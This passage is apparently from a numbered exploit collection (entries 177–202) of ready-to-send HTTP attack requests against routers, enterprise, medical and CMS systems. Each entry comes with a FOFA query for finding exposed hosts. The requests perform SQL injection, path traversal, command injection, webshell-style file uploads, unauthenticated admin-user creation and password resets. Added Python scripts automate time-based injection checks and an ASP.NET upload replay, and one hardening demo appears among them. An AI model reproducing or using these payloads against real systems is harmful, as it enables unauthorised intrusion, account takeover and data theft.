User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
Request the .cfg path that matches the device model:
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus-network self-service system flexFileUpload arbitrary file upload
FOFA: header="/selfservice"
The stored file name is taken from the part's name attribute (12234.txt), not from filename.
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

Then fetch the stored file:
GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA: app="帮管客-CRM"
Error-based: the result of user() comes back inside the MySQL XPATH syntax error raised by updatexml().
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 Interlib library cluster management system updOpuserPw SQL injection
FOFA: body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
Error-based Oracle injection via ctxsys.drithsx.sn in the token parameter. Note what the endpoint does: the request also carries a newpassword for loginid admin11, so only send it against an account you are authorised to change.
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA: server="SunFull-Webs"
The request body is raw SQL that the endpoint executes; as written it adds the account root/123456 with PURVIEW 4.
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA: app="REALOR-天翼应用虚拟化系统"
The appid value closes the original statement and runs SELECT unhex(...) INTO OUTFILE; the hex string decodes to <?php echo md5("1"); $file = __FILE__; unlink($file); and the output path is .\\..\\..\\WebRoot\\plom.xgi. The page gives no verification URL.
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation.
FOFA: title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

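The DataCube3 payload above is a heavy-query probe: RANDOMBLOB, HEX, CHAR and two-argument LIKE are SQLite functions, the leading "1)" closes the parenthesis the application put around req_id, and "AND (1450=1450" re-balances it so the statement still parses. The following Python is an added example, not code from the original article or from F-logic; the table, rows and function names are assumptions, and the blob size is cut from 500000000/2 to 2000000/2 so the query finishes in milliseconds. It shows the interpolating query beside a hardened one that validates the type and binds the value.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the table a monitoring endpoint would
    query; the schema and rows are assumptions for this demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE pr_monitor (req_id INTEGER PRIMARY KEY, site TEXT, kwh REAL);"
        "INSERT INTO pr_monitor VALUES (1, 'roof-a', 12.5), (2, 'roof-b', 7.25);"
    )
    return conn


# The page's payload with RANDOMBLOB shrunk so it stays recognisable but fast.
# LIKE('ABCDEFG', <2 MB hex string>) is never true, so the row count is the same
# as for any false condition; only the elapsed time changes, which is what a
# heavy-query probe measures.
HEAVY_PAYLOAD = ("1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),"
                 "UPPER(HEX(RANDOMBLOB(2000000/2)))) AND (1450=1450")


def get_index_data_vulnerable(conn: sqlite3.Connection, req_id: str) -> list:
    """String interpolation: the payload closes the '(' and appends its own conditions."""
    sql = f"SELECT site, kwh FROM pr_monitor WHERE (req_id={req_id})"
    return conn.execute(sql).fetchall()


def get_index_data_safe(conn: sqlite3.Connection, req_id: str) -> list:
    """Hardened: validate the type first, then bind the value so it can only ever be data."""
    try:
        rid = int(req_id)
    except (TypeError, ValueError):
        raise ValueError("req_id must be an integer") from None
    return conn.execute(
        "SELECT site, kwh FROM pr_monitor WHERE (req_id=?)", (rid,)
    ).fetchall()


def safe_rejects(conn: sqlite3.Connection, req_id: str) -> bool:
    """True when the hardened function refuses the input instead of running it."""
    try:
        get_index_data_safe(conn, req_id)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, tautology:", get_index_data_vulnerable(db, "1) OR (1=1"))
    print("vulnerable, heavy probe:", get_index_data_vulnerable(db, HEAVY_PAYLOAD))
    print("hardened rejects probe:", safe_rejects(db, HEAVY_PAYLOAD))
```

The vulnerable function returns every row for "1) OR (1=1" and none for "1) AND (1=2", which is the boolean signal injection tooling builds on; the hardened one raises ValueError for anything that is not an integer before any SQL runs.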
187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA: "Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体 佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA: body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 clinical browsing system deleteStudy SQL injection
FOFA: app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. Short-video matrix marketing system (短视频矩阵营销系统) poihuoqu arbitrary file read
FOFA: title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. Yisaitong (ESAFENET) Electronic Document Security Management System NavigationAjax SQL Injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

Time-based blind injection (MSSQL WAITFOR DELAY) in the id parameter; expect a delay of about 5 seconds on a vulnerable host.

192. Futong Tianxia Foreign Trade ERP UploadEmailAttr Arbitrary File Upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

The stored file name comes from the name query parameter, so the request body is saved as an .ashx handler that ASP.NET will execute; the handler above simply writes "test" when requested.

193. Hillstone Networks Yunjian (云鉴) Security Management System setSystemTimeAction Command Execution
FOFA:body="山石云鉴主机安全管理系统"
Step 1: fetch a CSRF token (substitute the returned value for {{token}} below):
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

Step 2: the param value is evaluated; write a marker file under the web root (Content-Length must match the body, 97 bytes for the line below):
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

Step 3: confirm the marker is served:
GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. Feiqi Hulian FE Enterprise Operations Management Platform uploadAttachmentServlet Arbitrary File Upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet gets a response, the vulnerable servlet is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

The multipart filename is used unsanitised, so the ../ sequence writes hello.jsp into the deployed fe.war directory instead of the attachment folder.

195. Feiyuxing (Volans) Enterprise Internet Behavior Management System send_order.cgi Command Execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

The name value is spliced into a shell command line unquoted: the leading ; ends the original command, uname -a runs, and the trailing echo swallows whatever follows the injection point.

196. Henan Fengsu Technology Unified Authentication Platform Password Reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

The request carries no session or token, so the endpoint is reachable unauthenticated; xgh is the staff/student ID whose password is set to newPass.

197. Zheda Ente (浙大恩特) Customer Resource Management System Quotegask_editAction SQL Injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

The ;.js path suffix is the static-resource suffix trick commonly used to get past a path-based authentication filter; goonumStr is then concatenated into the query, hence the ') UNION ALL SELECT payload.

198. Aliyun Drive WebDAV (aliyundrive-webdav LuCI app) Command Injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

The sid value decodes to `ls />/www/aaa.txt` (backtick command substitution); /www is the uhttpd web root, so the listing becomes readable at /aaa.txt. Note the sysauth cookie: this is a valid LuCI session, so the issue is post-authentication on the router UI.

199. Cockpit assetsmanager/upload File Upload
FOFA:title="Authenticate Please!"
1. Request the login page to obtain the csfr token, exchange it (with credentials) for a session cookie, then upload and fetch the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200; the page contains csfr:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT from the previous step to obtain a session cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload with the session cookie:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

Uploaded file path: /storage/uploads/tttt.php

The chain needs valid credentials (admin/admin in the example), so this is an authenticated upload of executable content, not a pre-auth issue; the uploaded script deletes itself after the first request.

200. SeaCMS (海洋CMS) Video Management System dmku SQL Injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

Time-based blind injection (MySQL sleep) in the id parameter of the danmaku (dmku) endpoint; a vulnerable host responds about 5 seconds late.

201. Founder All-Media News Editing System binary SQL Injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

TableName is concatenated straight into the query. Decoded it reads: DOM_IMAGE where REFID=-1 union select '1'; WAITFOR DELAY '0:0:5';select DOM_IMAGE from IMG_LARGE_PATH (stacked queries on MSSQL, so the 5-second delay is the signal).

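Entries 189, 191, 200 and 201 are all time-based blind injections: the only signal is a response that arrives roughly five seconds late, and a single slow request on a busy server looks exactly the same. The script below is an added example (it is not part of the original list and not any vendor's code) that turns that signal into a repeatable check: it measures a baseline with a benign value, then the delay payload, and reports a hit only when the median difference is close to the injected delay. The target URL, the parameter name and the send transport are assumptions; the payload shapes are those of entries 189/191/201 (MSSQL WAITFOR DELAY) and 200 (MySQL sleep).

```python
"""Time-based blind SQL injection verifier (added example, not from the original list).

Assumptions: the target takes the payload in a GET query parameter and is reachable
from where this runs; `send` can be swapped for any callable that returns elapsed seconds.
"""
import time
import urllib.parse
import urllib.request
from statistics import median

# Delay primitives as used by the entries above: MSSQL (189, 191, 201) and MySQL (200).
DELAY_TEMPLATES = {
    "mssql": "1';WAITFOR DELAY '0:0:{d}'--",
    "mysql": "(select(0)from(select(sleep({d})))v)",
}


def build_url(base_url, param, value):
    """Return base_url with query parameter `param` set to `value` (percent-encoded)."""
    parts = urllib.parse.urlsplit(base_url)
    query = dict(urllib.parse.parse_qsl(parts.query, keep_blank_values=True))
    query[param] = value
    return urllib.parse.urlunsplit(parts._replace(query=urllib.parse.urlencode(query)))


def timed_get(url, timeout=30.0):
    """Issue one GET and return the elapsed wall-clock seconds; the body is discarded.
    HTTP errors and connection failures still yield a timing: a delayed error is still a delay."""
    start = time.monotonic()
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            resp.read()
    except Exception:
        pass
    return time.monotonic() - start


def is_delayed(baseline, probe, delay, margin=0.7):
    """True when the probe median exceeds the baseline median by at least margin*delay.
    Medians rather than single samples keep one slow request from producing a false hit."""
    return median(probe) - median(baseline) >= delay * margin


def verify(base_url, param, dialect, delay=5, samples=3, send=timed_get):
    """Measure benign vs. delayed requests; return (hit, baseline_times, probe_times)."""
    benign_url = build_url(base_url, param, "1")
    probe_url = build_url(base_url, param, DELAY_TEMPLATES[dialect].format(d=delay))
    baseline = [send(benign_url) for _ in range(samples)]
    probe = [send(probe_url) for _ in range(samples)]
    return is_delayed(baseline, probe, delay), baseline, probe


if __name__ == "__main__":
    import sys
    # usage: python verify.py "http://host/xds/deleteStudy.php?documentUniqueId=1" documentUniqueId mssql
    hit, base, probe = verify(sys.argv[1], sys.argv[2], sys.argv[3])
    print("delayed" if hit else "no delay",
          [round(t, 2) for t in base], [round(t, 2) for t in probe])
```

Run it twice with different delay values (5 and then 10) before treating a hit as confirmed; a genuinely injectable parameter scales with the requested delay, a congested server does not.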
202. Weiqing (微擎) System AccountEdit Arbitrary File Upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace __VIEWSTATE and __EVENTVALIDATION below with the values obtained:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

Uploaded file path: /_data/Uploads/1123.txt

The POC uploads a harmless text file; confirm by fetching /_data/Uploads/1123.txt. The two-step sequence is required because ASP.NET rejects a postback whose __VIEWSTATE and __EVENTVALIDATION do not match what the server issued.

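The two requests in entry 202 have to be chained because ASP.NET rejects a postback whose __VIEWSTATE and __EVENTVALIDATION do not match the ones the server handed out. The snippet below is an added example (not the original author's and not the product's code) that automates the sequence: it harvests every hidden input from the GET response and rebuilds the multipart body with the exact field names from the POC. The HTML sample is constructed for the example, and the target URL used by replay() is an assumption.

```python
"""Replay an ASP.NET form upload (entry 202): harvest __VIEWSTATE/__EVENTVALIDATION,
then rebuild the multipart body. Added example; SAMPLE_PAGE is constructed and the
target host in replay() is an assumption."""
import urllib.request
import uuid
from html.parser import HTMLParser

# Field names exactly as they appear in the POC's multipart body.
UPLOAD_FIELD = "ctl00$MyContentPlaceHolder$ctl00$upload"
FORM_FIELDS = {
    "ctl00$MyContentPlaceHolder$ctl00$bttnUpload": "上传图片",
    "ctl00$MyContentPlaceHolder$ctl00$txtLastName": "",
    "ctl00$MyContentPlaceHolder$ctl00$txtEmail": "",
}

# Constructed stand-in for the GET /User/AccountEdit.aspx response (real pages are far longer).
SAMPLE_PAGE = """<html><body><form method="post" action="./AccountEdit.aspx">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTIzNDU2Nzg5MGRk" />
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEdAAJ1xAbC" />
<input type="file" name="ctl00$MyContentPlaceHolder$ctl00$upload" />
</form></body></html>"""


class HiddenFieldParser(HTMLParser):
    """Collect every <input type="hidden"> name/value pair (including __VIEWSTATEGENERATOR
    when present, since a faithful replay sends back everything the server issued)."""

    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "input":
            return
        attr = {k.lower(): (v or "") for k, v in attrs}
        if attr.get("type", "").lower() == "hidden" and attr.get("name"):
            self.fields[attr["name"]] = attr.get("value", "")


def extract_state(html):
    """Return the hidden fields; fail loudly if the page did not hand out both ASP.NET tokens."""
    parser = HiddenFieldParser()
    parser.feed(html)
    missing = [k for k in ("__VIEWSTATE", "__EVENTVALIDATION") if k not in parser.fields]
    if missing:
        raise ValueError("page did not expose " + ", ".join(missing))
    return parser.fields


def build_multipart(fields, file_field, filename, content, content_type="text/plain", boundary=None):
    """Serialise the text fields plus one file part; returns (body_bytes, content_type_header)."""
    boundary = boundary or uuid.uuid4().hex
    delim = b"--" + boundary.encode()
    chunks = []
    for name, value in fields.items():
        chunks += [delim, ('Content-Disposition: form-data; name="%s"' % name).encode(),
                   b"", value.encode("utf-8")]
    chunks += [
        delim,
        ('Content-Disposition: form-data; name="%s"; filename="%s"' % (file_field, filename)).encode(),
        ("Content-Type: %s" % content_type).encode(),
        b"",
        content,
    ]
    chunks += [delim + b"--", b""]
    return b"\r\n".join(chunks), "multipart/form-data; boundary=" + boundary


def prepare_upload(page_html, filename, content):
    """Combine the harvested tokens with the POC's fixed fields into a ready-to-send body."""
    fields = dict(extract_state(page_html))
    fields.update(FORM_FIELDS)
    return build_multipart(fields, UPLOAD_FIELD, filename, content)


def replay(base_url, filename, content):
    """GET the form, then POST the upload carrying the tokens it returned (assumed target URL)."""
    url = base_url.rstrip("/") + "/User/AccountEdit.aspx"
    with urllib.request.urlopen(url, timeout=15) as resp:
        page = resp.read().decode("utf-8", "replace")
    body, ctype = prepare_upload(page, filename, content)
    req = urllib.request.Request(url, data=body, method="POST",
                                 headers={"Content-Type": ctype, "Content-Length": str(len(body))})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.status
```

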